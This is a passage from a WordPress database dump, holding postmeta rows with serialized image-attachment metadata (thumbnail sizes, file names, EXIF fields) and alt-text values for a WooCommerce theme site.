.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-768x261.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-550x437.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan-1100x437.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-550x437.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan-1100x437.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"Long-orange-banan-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552031192\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1261,291,'_wp_attachment_image_alt','a'),(1262,1297,'_wp_attachment_image_alt',''),(1263,1299,'_wp_attachment_image_alt','a'),(1264,308,'_wp_attached_file','2018/01/pricing-img-3.png'),(1265,308,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:323;s:6:\"height\";i:171;s:4:\"file\";s:25:\"2018/01/pricing-img-3.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"pricing-img-3-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"pricing-img-3-300x159.png\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"pricing-img-3-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"pricing-img-3-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1266,1300,'_wp_attached_file','2018/01/product14-gallery2.jpg'),(1267,1300,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product14-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product14-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product14-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1268,1299,'_wp_attachment_image_alt','a'),(1269,1300,'_wp_attachment_image_alt','a'),(1270,3313,'_wp_attachment_image_alt','o'),(1271,3570,'_wp_attachment_image_alt','a'),(1272,3583,'_wp_attachment_image_alt','a'),(1273,3584,'_wp_attachment_image_alt','a'),(1274,3586,'_wp_attachment_image_alt','s'),(1275,943,'_wp_attachment_image_alt','o'),(1276,308,'_wp_attachment_image_alt','o'),(1277,3314,'_wp_attached_file','2018/02/h4-slide1-graphic1.png'),(1278,3314,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:336;s:6:\"height\";i:288;s:4:\"file\";s:30:\"2018/02/h4-slide1-graphic1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic1-300x288.png\";s:5:\"width\";i:300;s:6:\"height\";i:288;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic1-300x257.png\";s:5:\"width\";i:300;s:6:\"height\";i:257;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic1-300x288.png\";s:5:\"width\";i:300;s:6:\"height\";i:288;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1279,3626,'_wp_attached_file','2018/02/landing-gradient-1.jpg'),(1280,3626,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:430;s:4:\"file\";s:30:\"2018/02/landing-gradient-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"landing-gradient-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-600x134.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"landing-gradient-1-300x67.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"landing-gradient-1-1024x229.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-768x172.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"landing-gradient-1-1536x344.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-550x430.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"landing-gradient-1-1100x430.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-550x430.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"landing-gradient-1-1100x430.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"landing-gradient-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-600x134.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-gradient-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1281,944,'_wp_attached_file','2018/01/h8-slide1-graphic2.png'),(1282,944,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:74;s:6:\"height\";i:67;s:4:\"file\";s:30:\"2018/01/h8-slide1-graphic2.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1283,944,'_wp_attachment_image_alt','o'),(1284,343,'_wp_attached_file','2018/01/pricing-img-4.png'),(1285,343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:262;s:6:\"height\";i:177;s:4:\"file\";s:25:\"2018/01/pricing-img-4.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1286,947,'_wp_attached_file','2018/01/h8-img-2.png'),(1287,947,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:418;s:6:\"height\";i:418;s:4:\"file\";s:20:\"2018/01/h8-img-2.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h8-img-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h8-img-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h8-img-2-418x300.png\";s:5:\"width\";i:418;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h8-img-2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h8-img-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1288,343,'_wp_attachment_image_alt','o'),(1289,1300,'_wp_attachment_image_alt','a'),(1290,352,'_wp_attached_file','2018/01/pricing-img-2.jpg'),(1291,352,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:959;s:6:\"height\";i:504;s:4:\"file\";s:25:\"2018/01/pricing-img-2.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"pricing-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-600x315.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-550x504.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-550x504.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"pricing-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-600x315.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1292,3314,'_wp_attachment_image_alt',''),(1293,3586,'_wp_attachment_image_alt','s'),(1294,3626,'_wp_attachment_image_alt','a'),(1295,3315,'_wp_attached_file','2018/02/h4-slide1-graphic4.png'),(1296,3315,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:355;s:4:\"file\";s:30:\"2018/02/h4-slide1-graphic4.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-300x178.png\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-600x300.png\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-550x355.png\";s:5:\"width\";i:550;s:6:\"height\";i:355;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-550x355.png\";s:5:\"width\";i:550;s:6:\"height\";i:355;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1297,3715,'_wp_attached_file','2018/02/h3-slide2-graphicP.png'),(1298,3715,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:399;s:6:\"height\";i:399;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphicP.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphicP-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphicP-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphicP-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphicP-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphicP-399x300.png\";s:5:\"width\";i:399;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphicP-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphicP-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphicP-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1299,3310,'_wp_attachment_image_alt','o'),(1300,3311,'_wp_attachment_image_alt',''),(1301,3312,'_wp_attachment_image_alt',''),(1302,1715,'_wp_attachment_image_alt','o'),(1303,3313